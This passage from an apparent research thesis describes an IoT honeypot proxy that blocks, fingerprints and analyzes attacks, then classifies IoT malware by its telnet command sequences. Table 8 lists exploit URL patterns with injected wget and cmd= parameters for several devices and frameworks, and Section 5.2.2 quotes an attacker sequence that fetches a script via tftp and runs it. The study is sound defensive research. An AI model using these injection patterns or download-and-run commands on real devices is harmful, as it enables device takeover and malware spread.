Table 3 shows the distribution of HTTP methods in dataset 2. GET and POST requests account
for the vast majority (97%) and contain various cyber attacks against HTTP services. Some of the
OPTIONS requests come from the Real Time Streaming Protocol (RTSP) [52]. The RTSP traffic
indicates that some attackers or malware recognized our devices as IP Cameras and wanted to use
our RTSP services. The M-SEARCH and NOTIFY traffic is based on the Universal Plug and Play
(UPnP) protocol [53]. Our devices disable the UPnP port and services by default, but clients
still tried to attack the UPnP service. In the PROPFIND flows, the clients blindly sent remote
buffer overflow packets that target IIS 6.0 [54].
Table 3 HTTP method statistics for dataset 2.
HTTP method | Count | Percentage (%)
CONNECT | 420 | 0.022
GET | 1,512,526 | 78.751
HEAD | 7,062 | 0.368
M-SEARCH | 41,961 | 2.185
NOTIFY | 67 | 0.003
OPTIONS | 264 | 0.013
POST | 356,272 | 18.550
PROPFIND | 1,938 | 0.101
PUT | 132 | 0.006
Table 4 presents the statistics of HTTP requests, attackers' IP addresses, and URLs. Because we
forwarded fifteen IP addresses to IP Cameras A1, A2, and A3, these cameras together received the
most HTTP requests. However, among individual devices, IP Camera C received the most HTTP requests
even though only one IP address was forwarded to it.
Table 4 Statistics of cyber attacks. Observation of 7 months.
IoT device | Honeypot IP count | HTTP request count | Unique attacker IP count | Unique URL count
Router A | 1 | 17,447 | 1,808 | 6,150
IP Camera A1 | 5 | 340,316 | 22,336 | 2,300
IP Camera A2 | 5 | 455,639 | 23,196 | 4,546
IP Camera A3 | 5 | 193,941 | 13,642 | 1,573
IP Camera B | 1 | 54,024 | 4,581 | 1,740
IP Camera C | 1 | 782,645 | 4,291 | 28,111
IP Camera D | 1 | 76,641 | 4,422 | 1,395
Total | 19 | 1,920,653 | 57,230 | 38,374
4.4.2. Cyber attacks against the WebUI of physical IoT devices
In dataset 2, our honeypot received 1,920,653 HTTP requests. Some of the attacks they carry can
only be observed with physical devices. We observed attacks similar to those reported for the
honeypots of Ezawa et al. and Tamiya et al. [7][17]. Attackers attempted to capture and modify the
configuration of devices, remotely control the direction and zoom of IP Cameras, peep at the live
video, take snapshots from IP Cameras, and exploit the remote code execution (RCE) vulnerability
of devices [55]. In addition, after the RCE attack, the attacker downloaded the device's live stream
by accessing a hidden web application. The application "/video.cgi" does not appear in the source
code and can be customized with width and height parameters. Table 5 shows the statistics and
descriptions of the attacks against our physical devices.
Clients from 49 source IP addresses watched the live stream of the cameras. Among them, five IP
addresses peeped for over an hour, and the longest peeping session lasted about 18 hours. Moreover,
clients from 21 source IP addresses adjusted the direction and zoom of the camera. One client
from the United States applied the RCE exploit code for IP Camera C to attack IP Cameras C and D.
The live stream for long term peeping, the real-time response to direction and zoom control, and
the whole scenario of the RCE attack are hard to simulate with a VM-based honeypot. Our physical
devices behind ThingGate successfully observed these kinds of cyber attacks.
Table 5 Cyber attacks against WebUI of IoT devices. Observation of 7 months from IP Camera A1~A3,
B, C, and D.
Category | Pathname | Description of URL | Victim devices | Request count
Configuration information theft attacks | get_params.cgi | Show system variables | IP Camera A1~A3, B | 599
Configuration information theft attacks | get_status.cgi | Show configuration of devices | IP Camera A1~A3, B, C, D | 1,064
Modification of the configuration | /%5ccgi-bin/set_network.cgi | Set network configuration | IP Camera A3 | 83
Modification of the configuration | decoder_control.cgi | Control direction and zoom | IP Camera A1~A3 | 153
Snapshot attacks | snapshot.cgi | Show current image of live video stream | IP Camera A1~A3, B | 2,920
Long term peeping | livestream.cgi | Show live video stream | IP Camera A1~A3 | 4,560
Long term peeping | videostream.cgi | Show live video stream | IP Camera A1~A3, B | 273
Remote Command Execution | /setSystemCommand | Set OS commands for execution | IP Camera C, D | 4
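The grouping used in Table 5 can be reproduced from raw request URLs with a pathname lookup. The sketch below is only illustrative: the function names are hypothetical, the mapping is taken from the pathnames listed in Table 5, and it ignores session duration, which in practice is what distinguishes long term peeping from a brief visit to the live stream page.

```python
from collections import Counter
from urllib.parse import urlsplit

# Final path component -> attack category, following Table 5.
CATEGORY_BY_PATH = {
    "get_params.cgi": "configuration information theft",
    "get_status.cgi": "configuration information theft",
    "set_network.cgi": "modification of the configuration",
    "decoder_control.cgi": "modification of the configuration",
    "snapshot.cgi": "snapshot",
    "livestream.cgi": "long term peeping",
    "videostream.cgi": "long term peeping",
    "setSystemCommand": "remote command execution",
}


def categorize(url: str) -> str:
    """Map a request URL to an attack category by its last path component."""
    name = urlsplit(url).path.rsplit("/", 1)[-1]
    return CATEGORY_BY_PATH.get(name, "other")


def count_categories(urls: list[str]) -> Counter:
    """Count how many requests fall into each category."""
    return Counter(categorize(url) for url in urls)
```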
4.4.3. Blocking unwanted flow experiments
4.4.3.1. Design of experiment
We analyzed our devices and created a list of configuration URLs and dangerous vulnerabilities.
The list contains 51 critical configuration URLs and one dangerous URL. We extracted the
pathnames of the configuration URLs to build a blacklist and selected target pages on the devices
to replace the pathnames in the blacklist. Table 6 presents the blacklist for IP Cameras A1~A3.
We deployed the blacklist in ThingGate and redirected the flow to the target pages if the incoming
traffic matched the blacklist. The flow of one IP address was forwarded to each device, except for
IP Cameras A1~A3, each of which received the flow of five IP addresses (Table 4).
Table 6 Configuration blacklist and replaced pathnames against IP Camera A1~A3.
Configuration pathname | Description of pathname | Replaced pathname | Description of pathname
/set_network.cgi | change network settings | /admin2.htm | show camera status
/reboot.cgi | reboot camera | /admin2.htm | show camera status
/set_upnp.cgi | change UPnP settings | /upnp.htm | show UPnP information
/set_wifi.cgi | set Wi-Fi network | /wireless.htm | show Wi-Fi settings
/set_ddns.cgi | change dynamic DNS settings | /ddns.htm | show dynamic DNS settings
/set_users.cgi | change user settings | /user.htm | show user account settings
/restore_factory.cgi | restore factory settings | /upgrade.htm | show upgrade functions
/upgrade_htmls.cgi | upgrade system firmware | /upgrade.htm | show upgrade functions
/upgrade_htmls.cgi | upgrade WebUI | /upgrade.htm | show upgrade functions
4.4.3.2. Experimental results
In dataset 2, we found that on June 7, an attacker from the United States accessed the Wi-Fi
router in our honeypot and attempted to change the LAN DNS setting to point to a server in Vietnam.
ThingGate successfully blocked the HTTP request, filtered out the form data, and replaced the URL
with another URL of the WebUI. Fig. 8 shows the details of the HTTP request.
Fig. 8 The HTTP request of a modifying configuration attack.
4.4.4. Web tracking experiments
4.4.4.1. Design of experiment
We conducted this experiment on all devices in our honeypot. As illustrated in Fig. 9,
ThingGate examined the HTTP response content from all of the devices. If the response code
is 200 and the HTML contains a body tag, the proxy injects fingerprinting JavaScript code into
the response. If the client can execute our JavaScript code, the client generates a canvas
fingerprint and sends it back to ThingGate.
Fig. 9 Web Tracking flow of ThingGate
4.4.4.2. Experimental results
From dataset 2, we found that clients from 18 different source IPs successfully sent their
fingerprint values to ThingGate. We collected 26 different fingerprint values from these clients.
The geographic information on the IPs of the fingerprinted clients is displayed in Fig. 10. Of these
clients, seven were from Japan and six were from the United States. In total, 72% of the clients
were from these two countries. Four clients provided only one fingerprint value, whereas the other
14 clients provided two or more fingerprint values. Moreover, we discovered that one of the four
single-fingerprinted clients was Googlebot [56]. We verified Googlebot by using a reverse DNS
lookup on the accessed IP address according to a Google document [57] (Fig. 11). Googlebot
accessed IP Camera C and sent requests to 18 different URLs of the WebUI. These URLs included
the snapshot, camera parameter, DDNS, and Wi-Fi setting pages. Googlebot successfully collected
the configuration information of the device, including our fabricated Wi-Fi AP list.
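The reverse DNS check used to verify Googlebot can be sketched with the `socket` module. This is an illustrative sketch rather than the procedure used in the study: the function name is hypothetical, the accepted domain suffixes reflect our understanding of Google's guidance and should be checked against the current document, and the resolver functions are passed in as parameters so that the logic can be exercised without network access.

```python
import socket


def is_verified_googlebot(ip, reverse_lookup=socket.gethostbyaddr,
                          forward_lookup=socket.gethostbyname_ex):
    """Reverse-resolve the IP, check the domain, then forward-resolve and confirm the IP."""
    try:
        hostname = reverse_lookup(ip)[0]
    except OSError:
        return False  # no PTR record or lookup failure
    if not hostname.endswith((".googlebot.com", ".google.com")):
        return False  # assumed list of accepted domains
    try:
        addresses = forward_lookup(hostname)[2]
    except OSError:
        return False
    return ip in addresses  # the forward lookup must lead back to the same IP
```

The forward confirmation matters because the owner of an IP address controls its PTR record and could otherwise claim any hostname.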
Fig. 10 Country distribution of fingerprinted clients
Fig. 11 Googlebot’s user-agent and the verifying result
Among the fingerprinted clients, three US clients sent the same two fingerprint values back to
ThingGate. Table 7 presents the attack features of the three clients. They accessed almost all of
the forwarded IP addresses of the honeypot. Moreover, at least 27% of each client's unique URLs
were requested with the HEAD method, and at least 83% of the URLs requested by the second and
third clients were also requested by the first client. The identical features and fingerprint
values imply that the three clients belonged to the same attacker.
Table 7 Features of the fingerprinted clients.
Source IP address | Victim devices | Unique URL count | HEAD URLs count | Common URLs with 1st IP | Attack duration
xxx.xxx.226.109 | IP Camera A1~A3, B, C, and D | 128 | 44 | N/A | 2018/12/05~2019/01/11
xxx.xxx.32.101 | IP Camera A1~A3, B, C, and D | 74 | 23 | 62 | 2018/12/14~2019/01/23
xxx.xxx.30.101 | IP Camera A1~A3, B, C, and D | 33 | 9 | 32 | 2018/12/28~2019/01/11
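The HEAD and common-URL shares discussed for these three clients follow directly from the counts in Table 7. The short calculation below reproduces them; the variable and function names are ours, and the rounding to one decimal place is a presentation choice.

```python
# (unique URLs, URLs requested with HEAD, URLs shared with the first client) from Table 7
clients = {
    "xxx.xxx.226.109": (128, 44, None),
    "xxx.xxx.32.101": (74, 23, 62),
    "xxx.xxx.30.101": (33, 9, 32),
}


def percent(part: int, whole: int) -> float:
    """Share of part in whole, as a percentage rounded to one decimal place."""
    return round(100 * part / whole, 1)


head_share = {ip: percent(head, total) for ip, (total, head, _) in clients.items()}
common_share = {
    ip: percent(common, total)
    for ip, (total, _, common) in clients.items()
    if common is not None
}
```

The smallest HEAD share is about 27% (9 of 33 URLs) and the smallest common-URL share is about 84% (62 of 74 URLs), which is where the lower bounds quoted for these clients come from.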
4.4.5. Managing misplaced attacks experiments
4.4.5.1. Design of experiment
ThingGate examines all of the incoming flow to the 19 IP addresses. If OS commands and the URL
of a different site are embedded in the request URL, our program redirects the flow to the CAD in
an MITM manner. Next, the CI-URL analyzer analyzes the URLs and the downloaded scripts. The
downloader handles all downloading tasks if our parsers extract any link during the analysis.
4.4.5.2. Experimental results
The attack flow of dataset 2 revealed that ThingGate successfully redirected the HTTP requests
of 411 CI-URLs to the CAD. These CI-URLs contained 50 different URLs that exploited seven
vulnerabilities. Fig. 12 depicts the vulnerability distribution of the URLs. A total of 76% of the
CI-URLs used the top two vulnerabilities, which affect products of D-Link and ThinkPHP; these
two vulnerabilities were used about three times as often as all the others combined. Table 8
presents information on the seven vulnerabilities, including the maker, model, version, and path
of the WebUI.
Fig. 12 Vulnerability distribution of CI-URL
Table 8 Information of vulnerabilities. Observation of 7 months from IP Camera A1~A3, B, C, and D.
Maker | CVE/Exploit DB | Type | Model/version | URL pattern of vulnerability
D-Link | OS Command Injection (Metasploit) [49] | Router | DSL-2750B | /login.cgi?cli=aa%20aa%27;wget%20
ThinkPHP | Remote Code Execution [58] | Web app framework | V5.X | /index.php?s=/index/\think\app/invokefunction&function
AVTECH | 2015-2280 [59] | Camera/NVR/DVR | all versions | /cgibin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$
AirLink | 2015-2280 [60] | Camera | SkyIPCam1620W | /maker/snwrite.cgi?mac=1234&
Fastweb | 2018-11336 [61] | Modem | V0.0067 | /status.cgi_=1526904600131&cmd=3&nvget=login_confirm&password
MikroTik | 2018-14847 [62] | RouterOS | Before V6.38.4 | /jsproxy?
TUTOS | 'cmd.php' Remote Command Execution [63] | Software | V1.3 | /tutos/php/admin/cmd.php?cmd=
From the 411 CI-URLs, the CAD successfully downloaded 150 different malware binaries and
23 scripts. To label these malware binaries, we first searched for a suitable labeling method.
VirusTotal [64] was the platform used to obtain scan results from 66 antivirus engines. We sent
12,821 unique malware MD5s collected by IoTPOT in 2017 and selected the most common malware
family name in the VirusTotal reports as the representative malware category. We also
found that Kaspersky, DrWeb, and ESET-NOD32 were the top three antivirus engines in terms of
detection ratio and consistency. We then conducted a local scan of 40,203 different IoT
malware binaries and found that DrWeb could label 39,245 of them, which comprises 97.61% of
the submitted malware. The labeling performance of DrWeb surpassed that of both Kaspersky
(69.82%) and ESET-NOD32 (74.57%). Therefore, we employed DrWeb to label the IoT malware
collected by the CAD in dataset 2.
DrWeb successfully marked 148 binaries. Fig. 13 illustrates the statistics of malware labels.
Mirai malware accounts for the vast majority of binary files (92%). We discovered that 18 Mirai
binaries employed ThinkPHP’s vulnerability to infect victim sites. Moreover, the BTCMine
malware (one binary) is a mining trojan. The attacker of the BTCMine malware also utilized the
vulnerability of ThinkPHP to attack our honeypot.
Fig. 13 Statistic of malware labels
4.4.6. Fabricated sensor information experiment
4.4.6.1. Design of experiment
We selected the WebUI of all of the IP Cameras as the targets to protect. ThingGate monitored
the flow of the 18 IP addresses forwarded to these cameras. If a client requested the web page
that shows the Wi-Fi scan results, we replaced the information with fabricated information. Fig.
14 depicts the web pages before and after modification by ThingGate.
Fig. 14 Fabricated Wi-Fi AP list
4.4.6.2. Experimental results
In dataset 2, we found that ThingGate successfully sent fabricated Wi-Fi information to 44
different clients in 80 HTTP responses. Table 9 presents the geographical location, number of
requests sent, and duration of visit for some of these attackers. The Googlebot client sent only
23 HTTP requests in one day.
Table 9 Part of attackers who request Wi-Fi information. Observation of 7 months from IP Camera
A1~A3, B, C, and D.
Client | Source IP | Country | Requests for Wi-Fi | Total request count | Attack duration
Client A | aaa.aaa.202.28 | USA | 3 | 2,704 | 2018/12/12~2018/12/12
Client B | bbb.bbb.169.38 | USA | 3 | 4,167 | 2018/12/23~2018/12/23
Client C | ccc.ccc.226.5 | USA | 6 | 3,476 | 2018/12/17~2019/01/12
Client D | ddd.ddd.89.58 | China | 1 | 537 | 2019/01/11~2019/01/11
Client E | eee.eee.148.116 | China | 3 | 2,333 | 2018/11/19~2018/11/19
Client F | fff.fff.15.51 | France | 3 | 98 | 2019/01/07~2019/01/08
Client G | ggg.249.79.85* | USA | 1 | 23 | 2018/11/17~2018/11/17
* Client G is Googlebot.
4.4.7. Stress testing against IoT devices
4.4.7.1. Design of experiment
According to dataset 2, one device receives about 0.33 HTTP requests per minute on average.
Rounding this up gives one HTTP request per minute. We therefore assume that up to five users may
watch the live stream of an IP Camera concurrently. Our testing employs five Chrome browsers
(v72.0.3626.121) on five computers to log in to the IP Cameras and view the pages that contain
live streams. We conduct the test both through ThingGate and by accessing the WebUI directly,
and we repeat each condition ten times.
4.4.7.2. Experimental results
Table 10 shows the statistics of the testing results for access through ThingGate and for
directly forwarded flow. The results show that attackers receive the same rendered video under the
two conditions. IP Camera B supports only four clients downloading the live stream at the same
time. Therefore, our clients sent 50 requests under each condition and received only 40 responses
with live streams.
Table 10 IoT devices used in experiments.
IoT device | Path | Clients downloading video through ThingGate | Clients downloading video directly
IP Camera A1 | /monitor2.htm | 50 | 50
IP Camera B | /main.htm | 40/50 | 40/50
IP Camera C | /video.cgi* | 50 | 50
IP Camera D | /top.htm | 50 | 50
* The certificates in the default firmware of IP Camera C are out of date. Hence, browsers
including IE, Firefox, Chrome, and Safari block the rendering of the live stream on the default web
pages. We therefore used the hidden live stream application (/video.cgi), which was employed by
the attacker described in 4.4.2, for the evaluation.
4.5. Discussion
From the observation of cyber attacks in dataset 2, our honeypot successfully collected attacks
against physical IoT devices through ThingGate. Attacks such as peeping at video streams,
controlling the direction of the camera, and conducting an RCE attack and then downloading the
live stream via a hidden web application are hard to simulate with a virtual machine. The blocking
unwanted flow experiment shows that ThingGate can block attacks that change critical
configurations. In the fabricated sensor information experiment, we found that 44 clients
requested the Wi-Fi AP information web page. Of these 44 clients, 41 employed a predefined list to
scan victims, two were human-like attackers, and one was Googlebot. In the web tracking experiment,
we successfully extended a tracking function to IoT devices and tracked an attacker who employed
three US IP addresses to visit our honeypot. Regarding misplaced attacks, ThingGate extracted 411
CI-URLs and downloaded 149 different malware binaries and 23 scripts. Moreover, we found that
18 binaries exploited the ThinkPHP vulnerability, which affects not an IoT device but a web
application framework. The abuse of HTTP port 80 is becoming more serious. The stress testing
results show that attackers get the same rendered live stream from IP Cameras through ThingGate.
Hence, we can build bare-metal IoT honeypots together with ThingGate.
4.5.1. Limitations
ThingGate has some limitations, many of which come from the design of the CI-URL analyzer.
First, the URL parser only analyzes CI-URLs in which the attacker embedded OS commands in the
URL; our program does not yet check other header fields or form data. Second, the script parser
can handle only several kinds of shell scripts. A Linux sandbox could resolve more types of
scripts; however, the sandbox must be monitored and implemented with a high-security design
because of threats such as BrickerBot. Third, our web tracking function relies on JavaScript and
canvas fingerprinting. Therefore, if a client cannot execute the JavaScript code, it cannot
trigger the fingerprint function.
Chapter 5.
IoT Malware Analysis and New Pattern Discovery Through
Sequence Analysis Using Meta-Feature Information
5.1. Introduction
Internet of Things (IoT) is a network of physical devices, such as vehicles, furniture, and
buildings, that are embedded with electronics, sensors, and networking abilities. Connectivity
enables these objects to collect and exchange data for further application. However, in October
2016, the IoT malware called Mirai executed a massive distributed denial of service (DDoS)
attack against Dyn DNS, enlisting approximately 100,000 Mirai IoT botnet nodes for a reported
attack rate of up to 1.2 Tbps [2]. According to a Kaspersky report from September 2018, Mirai is
still the most popular IoT malware family among cybercriminals (20.9%). Moreover, the most popular
attack and infection vector against devices remains the telnet service (75.4%) [8]. Although
signature-based detection methods are sensitive to the structures of existing malware samples,
even a small change in a malware program could alter its signature sufficiently to thwart antivirus
detection. Therefore, it is urgently necessary to analyze IoT malware and related logs to recognize
the behavior of unfamiliar threats and thus assist organizations in mounting a timely and
appropriate defense.
Gartner estimated that 6.4 billion IoT devices were in use in 2016, and the number is projected
to grow to 20.8 billion by 2020 [1]. Embedding information and communication technology into
devices thus represents an ongoing trend. The nature of IoT presents challenges in establishing a
comprehensive security mechanism. These challenges arising from IoT devices are as follows:
1. Most IoT devices are always online.
2. Most utilize simple, low-level hardware.
3. IoT devices have a variety of CPU architectures and OS.
4. Antivirus and monitoring services are lacking.
5. Diverse developers result in a lack of unified standards.
6. IoT malware attack patterns are continually evolving, with an extremely large damage scope.
Few IoT devices are protected by antivirus software. To analyze the threat of IoT malware, Pa et
al. [4] proposed IoTPOT, a honeypot that observes cyber attacks against IoT devices, focusing on
telnet-based attacks; it emulates IoT devices that accept telnet connections. When
attackers access IoTPOT, it records the entire netflow and maintains logs for further analysis, such
as downloading samples. Since 2015, 6,016,030 download attempts from 1,085,664 different
hosts have been successfully observed and over 40,000 malware samples downloaded. Moreover,
124,517,838 telnet session logs have been collected, recording all the shell command input sent
by the attackers. IoTPOT thus represents a useful method of collecting samples, analyzing threat
behavior, and understanding cyber attacks in IoT. However, the enormous data size results in
huge time and resource costs when analyzing patterns and relationships. It is urgently
necessary to create an appropriate view that analyzes the incoming data in depth and uses our
resources efficiently.
The purpose of this study is to apply machine learning techniques to create a simplified and
accurate view of cyber attacks in IoT. The method determines categories of malware by analyzing
its meta-features and command sequences. Its contributions may be summarized as follows:
1. We showed that similar IoT malware binaries issue similar infection commands. Moreover,
through similarity analysis of command sequences, we can identify the malware category of
unknown threats.
2. By clustering telnet logs, we discovered a new DoS cyber attack executed using pure Linux
commands, without IoT malware binaries.
3. Using malware samples from the IoT honeypot, our proposed method could identify malware
categories with 96.70% accuracy.
5.2. Methods
5.2.1 Preliminaries
All the data in this research were observed in IoTPOT [4]. We used VirusTotal malware labels
as the ground truth of data. Command sequences were extracted from IoTPOT telnet session logs
and concatenated into a sequence according to the input order. A command sequence could
contain single or multiple shell command clauses. In this study, we mainly analyzed infection
sequences according to target, purpose, and frequency, and found that most of them consisted of
five types of atomic behavior:
1. Authentication behavior
Login with ID and password
2. Resource scan behavior
Resource scan is a command that finds available functions and writable folders in an IoT
device; for example, “/bin/busybox Mirai” tests “/bin/busybox,” and “/bin/busybox cat
/proc/mounts” aims to find a writable folder.
3. Change directory behavior
Changes the directory/folder of the terminal’s shell.
4. Create or download files behavior
Uses “echo” to produce binary files or “wget,” “tftp” to download files.
5. Execution behavior
Uses “sh” to execute downloaded binary or script files.
Malware sometimes executes “chmod” to alter file privileges, “history -c -r” to purge the
shell history, “rm” to remove files, and “exit” to terminate the session. These commands may be
executed multiple times to ensure that the infection is successful. Only a few “kill” and “killall”
commands were found in our data; they mostly appeared together with the “while true;” loop and “wget”
commands.
We collected 69 million command sequences containing the Mirai signature. All of these
sequences were of the recognition type, containing only login credentials and several Linux
commands such as "enable, system, shell, sh, and /bin/busybox echo." These commands were not
related to malware binaries, and each sequence carried too little information for analysis.
IoTPOT did not capture any Mirai infection command sequences because dozens of verification
steps are performed by the attacker’s server, each of which must receive a corresponding response,
such as the “echo,” “cat /etc/mounts,” and “cp /bin/echo” commands. We determined these steps
based on the Mirai source code [65][66]. To observe Mirai’s infection command sequence, we
developed new honeypots consisting of physical IoT devices that could respond correctly to Mirai.
We thereby captured 578,671 Mirai command sequences from December 11, 2016, to February
28, 2017, approximately 32% of which were infection command sequences executed by Mirai
and 68% of which were simple recognition command sequences. We therefore had to narrow the
scope of the command sequences, focusing on those that related to downloaded malware binaries
or posed a serious cybersecurity threat. Table 11 shows the results of other research [4] with a
comparison of labels.
Table 11 Comparison of labels and infection command sequence [4].
Label | Pattern of command sequence | Number of attacks/day (average)
Bashlite | Using a downloaded shell script, kill previously running malicious process, download malware binaries of different CPU architectures, and block 23/TCP to prevent other infections. Run all downloaded malware binaries. | 290
Nttpd | Change directory to /tmp. Check whether shell can be used by echoing “welcome.” Run binaries. | 48
ZORRO | Check whether “wget” command is usable. Check whether busybox shell can be used by echoing “ZORRO.” Remove various commands and files under /usr/bin/, /bin, /var/run/, and /dev. Copy /bin/sh to random filename. Append series of binaries to random filename and make attacker’s own shell. Using attacker’s own shell, download binary. The IP address and port number of the malware download server can be seen in the command. Run binaries. | 2232
In this study, VirusTotal was used to obtain scan results from 66 antivirus engines. We sent
12,821 unique malware MD5s from IoTPOT and received 3,306 reports. We then chose the most
frequent malware family name as the representative malware category. Table 12 shows the top
five antivirus engines for IoT malware.
Table 12 Top 5 antivirus engines for IoT malware.
AV / Consistency (%) | Mirai (207) | Bashlite (2733) | Hajime (5) | Tsunami (48)
Kaspersky | 98.06 | 100 | 100 | 89.58
DrWeb | 96.61 | 97.36 | 100 | 60.41
ESET-NOD32 | 98.55 | 93.66 | 100 | 91.66
Sophos | 85.50 | 89.82 | 80 | 95.83
Avast | 85.02 | 88.58 | 20 | 35.41
We chose Kaspersky, DrWeb, and ESET-NOD32 to locally scan 40,203 different IoT malware
binaries and found that DrWeb could label 39,245 of them, representing 97.61% of the submitted
malware and thus surpassing Kaspersky (69.82%) and ESET-NOD32 (74.57%). Therefore, we
employed DrWeb to label the IoT malware as the basis for malware categories.
5.2.2. Encoding and measurement of command sequences
Data encoding. To process numerous complex sequences, we used a simplified representative
form called extracted command tokens (ECTs). For example, the command sequence [‘cd
/tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; tftp -r tftp.sh -g test.test.org; sh tftp.sh;
busybox wget http’] can be expressed as the encoded sequence “ccccctsw,” which represents each
command by a single letter, such as “w” for “wget” and “c” for “cd.” We built a table mapping
each of the 51 commands to a corresponding letter and then applied a natural
language processing algorithm to classify the ECTs. An example of a command mapping table is shown in Table
13. These commands were derived from historical observation data in the IoTPOT.
Table 13 An example of the command mapping table.
Command | Token | Command | Token
/bin/busybox | B | exit | q
cd | C | chmod | c
enable | e | echo | E
sh | h | wget | w
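The encoding step can be sketched in a few lines of Python. This is a minimal illustration, not the implementation used in the study: the four-entry mapping is a hypothetical subset chosen only to reproduce the in-text example “ccccctsw” (the study's table covers 51 commands), and skipping a leading busybox wrapper is an assumption made for the same reason.

```python
import re

# Hypothetical mapping (assumption): only the letters needed for the in-text
# example. The study's full table maps 51 commands to letters.
TOKEN_MAP = {"cd": "c", "tftp": "t", "sh": "s", "wget": "w"}
BUSYBOX_WRAPPERS = {"busybox", "/bin/busybox"}


def encode_ect(sequence):
    """Encode a shell command sequence as one letter per recognised command."""
    letters = []
    # Split the sequence into clauses on ';', '||', '&&' and '|'.
    for clause in re.split(r"\|\||&&|[;|]", sequence):
        words = clause.split()
        # Assumption: a leading busybox wrapper is skipped when an applet follows.
        if len(words) > 1 and words[0] in BUSYBOX_WRAPPERS:
            words = words[1:]
        # Commands that are not in the mapping are ignored in this sketch.
        if words and words[0] in TOKEN_MAP:
            letters.append(TOKEN_MAP[words[0]])
    return "".join(letters)


example = (
    "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; "
    "tftp -r tftp.sh -g test.test.org; sh tftp.sh; busybox wget http"
)
print(encode_ect(example))  # ccccctsw
```

Arguments such as paths, host names, and URLs are dropped, which is why many distinct command sequences collapse into a much smaller set of ECTs.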
Comparison of distance measures. The following six distances [67] were applied to measure
the dissimilarity between different categories. Each distance is one minus the corresponding similarity.
1. Cosine: Cosine similarity is a measure of similarity between two non-zero vectors of an inner
product space that measures the cosine of the angle between them. The strings are first
transformed into vectors of occurrences of k-shingles (sequences of k characters) [68]. In the
n-dimensional space, the similarity between the two strings is the cosine of the angle between
their respective vectors. The cosine similarity between two strings s1 and s2 is defined as follows:
$$\cos(v_1, v_2) = \frac{v_1 \cdot v_2}{|v_1| \cdot |v_2|}$$
where v1 and v2 are the vectors of k-shingle occurrences for strings s1 and
s2. In our system, we set k = 3.
2. Trigram: The trigram distance measures how similar two strings are. The
similarity between two strings X and Y is defined as the ratio of twice the number of trigrams
shared by the two strings to the total number of trigrams in both strings [69]:
$$\frac{2 \times |\mathrm{trigrams}(X) \cap \mathrm{trigrams}(Y)|}{|\mathrm{trigrams}(X)| + |\mathrm{trigrams}(Y)|}$$
where trigrams(X) is the multiset of letter trigrams in X.
3. Normalized longest common subsequence (NLCS): The longest common subsequence can
be considered the sequential analog of the cosine distance between two ordered sets. Thus,
given two sequences X and Y, of lengths m and n respectively, we calculate the NLCS by the
formula [70]:
$$\mathrm{NLCS} = \frac{\mathrm{length}(\mathrm{LCS})}{m + n} + \varepsilon$$
where ε is a constant whose value is 0.5 if the first characters of the strings, x1 ∈ X and y1
∈ Y, match, and 0 otherwise.
4. Metric longest common subsequence (MLCS): Measures the degree of similarity between the
two series. The metric is defined as follows [71]:
$$\mathrm{MLCS} = \frac{\mathrm{length}(\mathrm{LCS})}{m + n}$$
5. Normalized Levenshtein Distance (NLD): The sum of the length normalized Levenshtein
distance between the words occupying the same meaning slot divided by the number of word
pairs. The Levenshtein distance between two strings x, y (of length |x|, |y| respectively) is
given by lev_{x,y}(|x|, |y|) as follows:
$$\mathrm{lev}_{x,y}(i, j) = \begin{cases} \max(i, j) & \text{if } \min(i, j) = 0 \\ \min \begin{cases} \mathrm{lev}_{x,y}(i - 1, j) + 1 \\ \mathrm{lev}_{x,y}(i, j - 1) + 1 \\ \mathrm{lev}_{x,y}(i - 1, j - 1) + 1_{(x_i \neq y_j)} \end{cases} & \text{otherwise} \end{cases}$$
where 1_{(x_i ≠ y_j)} is the indicator function equal to 0 when xi = yj and equal to 1 otherwise.
Normalized Levenshtein is defined by the formula [72]:
$$\mathrm{NormalizedLev}_{x,y} = \frac{\mathrm{lev}_{x,y}(|x|, |y|)}{\max(|x|, |y|)}$$
6. Jaro-Winkler: A string metric measuring an edit distance between two sequences that gives
more favorable ratings to strings that match from the beginning for a set prefix length. The
Jaro-Winkler distance is a variation of the Jaro distance. The Jaro distance dj of strings s1 and s2 is
defined as:
$$d_j(s_1, s_2) = \frac{m}{3 \cdot l_1} + \frac{m}{3 \cdot l_2} + \frac{m - t}{3 \cdot m}$$
where l1 and l2 are the lengths (in characters) of s1 and s2, m is the number of matching
characters, and t is half the number of transpositions. The Jaro-Winkler distance dw
emphasizes prefix similarity between two strings. It is defined as [73]:
$$d_w(s_1, s_2) = d_j(s_1, s_2) + l \cdot p \cdot (1 - d_j(s_1, s_2))$$
where l is the length of the longest common prefix of s1 and s2, and p is a constant scaling
factor that also controls the emphasis placed on prefix similarity. The implementation we
used considers prefixes up to 6 characters long, and sets p = 0.1.
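To make the first two measures concrete, the following sketch computes the trigram and cosine distances on ECT strings using only the Python standard library. It follows the definitions above (multiset trigrams, k = 3 shingles, distance = 1 − similarity); the function names and the handling of strings shorter than three characters are assumptions of this sketch, not details taken from the study's implementation.

```python
from collections import Counter
from math import sqrt


def trigrams(s):
    """Multiset of character trigrams (3-shingles) in s."""
    return Counter(s[i:i + 3] for i in range(len(s) - 2))


def trigram_distance(x, y):
    """1 - 2|T(X) ∩ T(Y)| / (|T(X)| + |T(Y)|), with multiset intersection."""
    tx, ty = trigrams(x), trigrams(y)
    total = sum(tx.values()) + sum(ty.values())
    if total == 0:
        # Assumption: strings too short to contain a trigram are compared directly.
        return 0.0 if x == y else 1.0
    shared = sum((tx & ty).values())  # Counter '&' keeps the minimum counts
    return 1.0 - 2.0 * shared / total


def cosine_distance(x, y):
    """1 - cosine of the angle between the trigram count vectors."""
    vx, vy = trigrams(x), trigrams(y)
    norm = sqrt(sum(c * c for c in vx.values())) * sqrt(sum(c * c for c in vy.values()))
    if norm == 0:
        return 1.0  # Assumption: no trigrams means no measurable similarity.
    dot = sum(count * vy[gram] for gram, count in vx.items())
    return 1.0 - dot / norm


print(trigram_distance("abcd", "abce"))
print(cosine_distance("abcd", "abce"))
```

For "abcd" and "abce", each string has two trigrams and one is shared, so both distances come out at 0.5; the measures diverge on longer sequences, where repeated trigrams are weighted differently.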
We chose the top 500 command sequences in the four categories and then calculated the
average and minimum distances between categories, with the results shown in Table 14 and Table
15. Specifically, we applied the six distance measures to calculate the adjacency matrix
between each pair of malware categories, and then calculated the average and minimum distances. The
columns under the “B-N” header indicate the distance between Bashlite and nttpd under the six
